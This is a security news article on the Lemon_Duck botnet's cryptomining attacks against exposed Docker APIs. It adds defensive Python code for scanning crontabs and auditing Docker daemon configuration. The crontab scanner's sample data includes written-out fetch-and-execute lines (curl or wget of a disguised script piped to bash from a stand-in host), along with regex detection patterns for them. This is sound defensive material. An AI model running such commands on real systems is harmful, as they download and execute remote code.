The operators of the Lemon_Duck botnet are targeting exposed Docker APIs on Linux systems as part of a large-scale Monero cryptomining campaign. Cryptomining groups are a persistent threat to Docker hosts that are not properly secured or configured, and several mass-exploitation campaigns have been recorded in recent years.
Lemon_Duck had previously targeted vulnerable Microsoft Exchange servers, Linux machines via SSH brute-force attacks, Windows systems vulnerable to SMBGhost, and servers hosting Redis and Hadoop instances. According to a CrowdStrike report published today, the threat actor behind the ongoing Lemon_Duck campaign is hiding its mining wallets behind proxy pools.
Lemon_Duck exploits unprotected Docker APIs by launching a malicious container that downloads a Bash script disguised as a PNG image. That payload sets up a cronjob in the container which downloads a second Bash script (a.asp) that does the following:
- Kills processes based on the names of known mining pools, competing cryptomining groups, and so on.
- Kills crond, sshd, syslog, and similar daemons.
- Deletes files at paths that have been identified as indicators of compromise (IOCs).
- Kills network connections to C2 servers suspected of belonging to rival cryptomining operations.
- Disables the Alibaba Cloud monitoring service, which protects instances against malicious activity.
Cryptomining malware from unattributed actors had already been observed disabling protective mechanisms in Alibaba Cloud services in November 2021. After completing the tasks above, the Bash script downloads and runs the XMRig mining program together with a configuration file that hides the actor's wallets behind proxy pools.
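The persistence step described above leaves a recognisable trace: a cron entry that fetches a remote script, possibly served under an image extension, and hands it to a shell. The following added example (not CrowdStrike's detection logic or any published IOC) scans a crontab for that pattern; the sample crontab, the 198.51.100.10 address and the regexes are constructed assumptions about what such an entry looks like.

```python
"""Flag crontab entries matching a fetch-and-execute persistence pattern:
a job that downloads a remote script (possibly disguised as an image) and
pipes or hands it to a shell.  Added example, not CrowdStrike's logic; the
sample crontab and the 198.51.100.10 address are constructed."""
import re
from typing import Dict, List

DOWNLOADERS = re.compile(r"\b(?:curl|wget)\b")
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
# "| sh" / "| bash": fetched bytes are executed without ever touching disk
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba)?sh\b")
# "sh FILE" / "bash -c FILE" where sh/bash is its own word (not backup.sh)
SHELL_RUNS_FILE = re.compile(r"(?:^|(?<=[\s;&|]))(?:ba)?sh\s+(?:-c\s+)?(\S+)")
# script served under an image extension, as with the PNG-disguised loader
DISGUISED_EXT = re.compile(r"\.(?:png|jpe?g|gif)\b", re.IGNORECASE)

SAMPLE_CRONTAB = """\
# constructed sample crontab, not a real capture
MAILTO=root
0 2 * * * /usr/bin/apt-get update -qq
*/5 * * * * curl -fsSL http://198.51.100.10/core.png | bash
@reboot wget -q -O /tmp/a.asp http://198.51.100.10/a.asp && bash /tmp/a.asp
0 * * * * /usr/local/bin/backup.sh --remote https://backup.example.net/upload
"""


def parse_entries(crontab: str) -> List[str]:
    """Return the command part of each job line; skip comments, blanks, VAR=value."""
    commands: List[str] = []
    for raw in crontab.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue
        special = line.startswith("@")          # @reboot, @hourly, ...
        parts = line.split(None, 1) if special else line.split(None, 5)
        if len(parts) == (2 if special else 6):
            commands.append(parts[-1])
    return commands


def classify(cmd: str) -> List[str]:
    """Name every detection rule the command trips (empty list if none)."""
    reasons: List[str] = []
    pipe = bool(PIPE_TO_SHELL.search(cmd))
    runs_file = bool(SHELL_RUNS_FILE.search(cmd))
    if DOWNLOADERS.search(cmd) and REMOTE_URL.search(cmd):
        reasons.append("remote_download")
    if pipe:
        reasons.append("pipe_to_shell")
    if runs_file:
        reasons.append("shell_runs_file")
    if DISGUISED_EXT.search(cmd) and (pipe or runs_file):
        reasons.append("disguised_script")
    return reasons


def is_suspicious(reasons: List[str]) -> bool:
    """A lone URL or a lone 'sh file' is normal; the combinations are not."""
    return (
        "pipe_to_shell" in reasons
        or "disguised_script" in reasons
        or ("remote_download" in reasons and "shell_runs_file" in reasons)
    )


def scan_crontab(crontab: str) -> Dict[str, List[str]]:
    """Map each suspicious command to the rules it tripped."""
    findings: Dict[str, List[str]] = {}
    for cmd in parse_entries(crontab):
        reasons = classify(cmd)
        if is_suspicious(reasons):
            findings[cmd] = reasons
    return findings


if __name__ == "__main__":
    for cmd, why in scan_crontab(SAMPLE_CRONTAB).items():
        print(f"SUSPICIOUS [{', '.join(why)}]: {cmd}")
```

Run it against `crontab -l` output and the `/etc/cron.d` and `/var/spool/cron` files of a suspect host or container; the benign backup line in the sample shows why a URL on its own is not treated as a hit, while a remote fetch that ends in a shell is.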
Once the infected host has been set up to mine, Lemon_Duck attempts lateral movement using any SSH keys found on the filesystem; if keys are available, the attacker uses them to infect further hosts. In parallel, Cisco Talos reports on another campaign, attributed to TeamTNT, that likewise targets Docker API instances exposed on Amazon Web Services.
To evade detection, the group tries to disable cloud security services so that it can mine Monero, Bitcoin, and Ether for as long as possible. Securely configuring Docker API installations is clearly critical, and administrators should start by comparing their setup against the platform's best practices and security guidelines: set resource consumption limits for all containers, enforce strict image authentication requirements, and follow the principle of least privilege.
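The exposure that both campaigns depend on is a Docker daemon answering on a TCP port without TLS client authentication. The following added example (not CrowdStrike's or Docker's own code) audits a daemon.json for that weak setting and builds a `docker run` command that applies the resource limits and least privilege the article recommends; the weak and hardened configurations, the 10.0.0.5 management address, the certificate paths and the limit values are constructed assumptions to be tuned per deployment.

```python
"""Audit a Docker daemon.json for an API reachable over plain TCP without
TLS client auth, and build a hardened 'docker run' argv.  Added example,
not CrowdStrike's or Docker's own code; both configs, the 10.0.0.5 address
and the limit values are constructed assumptions."""
import json
from typing import Dict, List

# Constructed weak config: the daemon answers unauthenticated on every interface.
WEAK_DAEMON_JSON: Dict = {
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
}

# Constructed hardened config: TCP only on one address, TLS client auth required.
HARDENED_DAEMON_JSON: Dict = {
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/certs/ca.pem",
    "tlscert": "/etc/docker/certs/server-cert.pem",
    "tlskey": "/etc/docker/certs/server-key.pem",
    "no-new-privileges": True,
    "userns-remap": "default",
    "icc": False,
}


def _bind_addr(host: str) -> str:
    """'tcp://0.0.0.0:2375' -> '0.0.0.0'; '' means the daemon bound all interfaces."""
    return host[len("tcp://"):].rsplit(":", 1)[0]


def audit_daemon_config(cfg: Dict) -> List[str]:
    """Return a list of findings; an empty list means no weak setting was seen."""
    findings: List[str] = []
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    if tcp_hosts:
        if not cfg.get("tlsverify"):
            findings.append(f"API on {tcp_hosts} without tlsverify: anyone who can reach the port can start containers")
        for key in ("tlscacert", "tlscert", "tlskey"):
            if key not in cfg:
                findings.append(f"missing {key}: TLS client authentication cannot be enforced")
        for host in tcp_hosts:
            if _bind_addr(host) in ("", "0.0.0.0", "[::]", "::"):
                findings.append(f"{host} binds all interfaces; bind a single management address instead")
    if not cfg.get("no-new-privileges"):
        findings.append("no-new-privileges is off: container processes can gain privileges via setuid binaries")
    if not cfg.get("userns-remap"):
        findings.append("userns-remap unset: root inside a container is root on the host")
    return findings


def hardened_run_args(image: str, *command: str) -> List[str]:
    """docker run argv with resource limits and least privilege applied."""
    return [
        "docker", "run", "--rm",
        "--read-only", "--tmpfs", "/tmp:rw,noexec,nosuid,size=64m",  # no writable image layer
        "--cap-drop=ALL",                            # no Linux capabilities at all
        "--security-opt=no-new-privileges:true",     # setuid/setcap cannot escalate
        "--user=65534:65534",                        # unprivileged uid/gid (nobody)
        "--pids-limit=100",                          # fork bombs and miner threads hit a ceiling
        "--memory=256m", "--cpus=0.5",               # resource consumption limits
        image, *command,
    ]


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(f"== {name} ==")
        for finding in audit_daemon_config(cfg) or ["no findings"]:
            print("  -", finding)
    print(json.dumps(HARDENED_DAEMON_JSON, indent=2))
    print(" ".join(hardened_run_args("alpine:3.19", "sh", "-c", "id")))
```

Point `audit_daemon_config` at the parsed contents of `/etc/docker/daemon.json` on each host; the run flags cover the resource-limit and least-privilege advice, while image authentication is handled separately by Docker Content Trust (`DOCKER_CONTENT_TRUST=1`), which refuses unsigned images at pull time.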